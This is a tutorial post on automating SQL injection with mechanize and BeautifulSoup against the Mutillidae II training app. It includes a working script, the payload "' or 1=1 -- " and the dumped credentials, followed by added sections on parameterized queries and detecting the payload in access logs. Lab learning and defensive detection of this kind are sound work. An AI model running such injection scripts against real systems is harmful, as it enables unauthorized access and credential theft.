Automate SQL-injection with mechanize and beautifulsoup in python

Python is a great tool to automate things and make things easier for you. Here I am going to show how to automate SQL-injection using Mechanize and BeautifulSoup Python packages. The target I am taking is Mutillidae II. The link in my case is http://192.168.178.25/mutillidae/index.php?page=user-info.php. You may have a different local IP address.

#!/usr/bin/python
# Install the packages first:
#   pip install mechanize
#   pip install beautifulsoup4
#   pip install lxml   (parser used below)
from __future__ import print_function  # lets the script run on Python 2 and 3
import sys
import mechanize
from bs4 import BeautifulSoup

br = mechanize.Browser()
br.open(sys.argv[1])  # give vulnerable link on command line
br.select_form(nr=0)  # select the first form
br.form['username'] = "' or 1=1 -- "  # inject our payload into the username field
br.submit()  # submit the form
resp_html = br.response().read()  # read the response
soup = BeautifulSoup(resp_html, 'lxml')  # parse the html with the lxml parser
data_list = []  # create empty list
for item in soup.find_all('span'):  # iterate over span tags and collect their text
    data_list.append(item.get_text())
data_list = data_list[12:]  # we are not interested in the data list up to index 11
count = 0
for item in data_list:  # print the data six fields per line so it looks pretty
    count += 1
    print(item, end=" ")
    if count % 6 == 0:
        print("")

In a terminal, run the Python script with the vulnerable link as its argument.

python script_name.py http://192.168.178.25/mutillidae/index.php?page=user-info.php

To understand this better, view the page source of the vulnerable page before and after the injection happens.

Output is:

Username= admin Password= admin Signature= g0t r00t?
Username= adrian Password= somepassword Signature= Zombie Films Rock!
Username= john Password= monkey Signature= I like the smell of confunk
Username= jeremy Password= password Signature= d1373 1337 speak
Username= bryce Password= password Signature= I Love SANS
Username= samurai Password= samurai Signature= Carving fools
Username= jim Password= password Signature= Rome is burning
Username= bobby Password= password Signature= Hank is my dad
Username= simba Password= password Signature= I am a super-cat
Username= dreveil Password= password Signature= Preparation H
Username= scotty Password= password Signature= Scotty do
Username= cal Password= password Signature= C-A-T-S Cats Cats Cats
Username= john Password= password Signature= Do the Duggie!
Username= kevin Password= 42 Signature= Doug Adams rocks
Username= dave Password= set Signature= Bet on S.E.T. FTW
Username= patches Password= tortoise Signature= meow
Username= rocky Password= stripes Signature= treats?
Username= tim Password= lanmaster53 Signature= Because reconnaissance is hard to spell
Username= ABaker Password= SoSecret Signature= Muffin tops only
Username= PPan Password= NotTelling Signature= Where is Tinker?
Username= CHook Password= JollyRoger Signature= Gator-hater
Username= james Password= i<3devs Signature= Occupation: Researcher
Username= user Password= user Signature= User Account
Username= ed Password= pentest Signature= Commandline KungFu anyone?
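The post asks you to compare the vulnerable page source before and after the injection, but does not show the query behind the form. The following is an added example, not code from the post and not Mutillidae's real PHP or database schema: a minimal sqlite3 model of why the payload above returns every account. The table, its columns and the three rows are constructed for the demonstration; the concatenated query stands in for the vulnerable lookup and the bound-parameter version is the fix.

```python
import sqlite3

# Constructed sample rows standing in for Mutillidae's accounts table (not its real schema).
SAMPLE_ACCOUNTS = [
    ("admin", "admin", "g0t r00t?"),
    ("adrian", "somepassword", "Zombie Films Rock!"),
    ("john", "monkey", "I like the smell of confunk"),
]

# The payload the post puts into the username field.
PAYLOAD = "' or 1=1 -- "


def make_db():
    """Create an in-memory database holding the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (username TEXT, password TEXT, signature TEXT)")
    conn.executemany("INSERT INTO accounts VALUES (?, ?, ?)", SAMPLE_ACCOUNTS)
    return conn


def lookup_vulnerable(conn, username, password):
    """String concatenation: the input becomes part of the SQL text, so a quote
    closes the literal, 'or 1=1' makes the WHERE clause always true and '--'
    comments out the password check."""
    sql = ("SELECT username, password, signature FROM accounts "
           "WHERE username='" + username + "' AND password='" + password + "'")
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, username, password):
    """Bound parameters: the input is only ever compared as a value, never parsed
    as SQL, so the same payload simply matches no row."""
    sql = ("SELECT username, password, signature FROM accounts "
           "WHERE username=? AND password=?")
    return conn.execute(sql, (username, password)).fetchall()


if __name__ == "__main__":
    conn = make_db()
    print("vulnerable:   ", lookup_vulnerable(conn, PAYLOAD, ""))
    print("parameterized:", lookup_parameterized(conn, PAYLOAD, ""))
```

Running it prints all three constructed rows for the concatenated query and an empty list for the parameterized one. Parameterized queries (or an ORM that uses them underneath) are the fix for this class of bug; stripping or escaping characters from the input is not a substitute.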

Data for Noobs like me:

Install the Mechanize and BeautifulSoup Python packages and import the required libraries. Then open the vulnerable link, select the form, inject the payload into the username field and submit the form.

The link after submission looks like this: http://192.168.178.25/mutillidae/index.php?page=user-info.php&username=%27+or+1%3D1+--+&password=&user-info-php-submit-button=View+Account+Details

Fetch the response into the resp_html variable and parse it with the lxml parser. Then, with the help of BeautifulSoup, find the <span> tags (that is where our data lies). There are multiple ways to get this data; it all depends on your approach. Maybe my way is longer than what you can think of.

The first for loop iterates over the list of span tags to get their text. After that, I drop the leading elements of the list up to index 11, as they are not of interest (see the page source after injection). The second loop just makes the data look prettier.

The things we can do with this are limitless; we can use automation to check XSS, SQL injection, and all the other attacks we use in web app pentesting. That's it. Thank you for reading.
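The encoded request shown above is also exactly what the injection looks like to whoever reads the web server's access log. The following is an added example, not from the post: a small detector that pulls the query string out of constructed Apache-style log lines, URL-decodes each parameter (so `%27+or+1%3D1+--+` becomes `' or 1=1 -- `) and flags values that contain a quote-led tautology or a SQL comment token. The log lines are constructed for the demonstration and the two regular expressions are a heuristic, not a complete injection grammar.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (not real logs). Line 1 carries the encoded
# request the post shows after submitting the form; line 2 is a normal lookup;
# line 3 is a legitimate name containing an apostrophe.
SAMPLE_LOG = """\
192.168.178.1 - - [10/Oct/2023:10:00:01 +0200] "GET /mutillidae/index.php?page=user-info.php&username=%27+or+1%3D1+--+&password=&user-info-php-submit-button=View+Account+Details HTTP/1.1" 200 5120
192.168.178.1 - - [10/Oct/2023:10:00:02 +0200] "GET /mutillidae/index.php?page=user-info.php&username=adrian&password=somepassword&user-info-php-submit-button=View+Account+Details HTTP/1.1" 200 1480
192.168.178.1 - - [10/Oct/2023:10:00:03 +0200] "GET /mutillidae/index.php?page=user-info.php&username=o%27brien&password=x HTTP/1.1" 200 1400
"""

# The quoted request part of a Common Log Format line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Heuristics applied to the *decoded* parameter value:
#   a quote followed by "or <x> = <y>"  (tautology such as ' or 1=1)
#   a SQL comment token                 (-- , #, /*)
TAUTOLOGY_RE = re.compile(r"'\s*or\s+\S+\s*=\s*\S+", re.IGNORECASE)
COMMENT_RE = re.compile(r"(--|#|/\*)")


def decoded_params(line):
    """Return the request's query parameters as a dict of decoded values."""
    m = REQUEST_RE.search(line)
    if not m:
        return {}
    query = urlsplit(m.group("target")).query
    return dict(parse_qsl(query, keep_blank_values=True))


def suspicious_params(line):
    """Names of the parameters whose decoded value looks like injected SQL."""
    hits = []
    for name, value in decoded_params(line).items():
        if TAUTOLOGY_RE.search(value) or COMMENT_RE.search(value):
            hits.append(name)
    return hits


def scan(log_text):
    """Return (line number, flagged parameter names) for every suspicious line."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        hits = suspicious_params(line)
        if hits:
            findings.append((lineno, hits))
    return findings


if __name__ == "__main__":
    for lineno, hits in scan(SAMPLE_LOG):
        print("line %d: injected SQL in parameter(s) %s" % (lineno, ", ".join(hits)))
```

Only the first line is reported, in its `username` parameter. The third line, a real name with an apostrophe, is deliberately left alone: a lone quote is a poor signal, which is why the rule requires the `or x=y` shape or a comment token after it. Decoding before matching matters because the same payload can be sent with different encodings of the same characters.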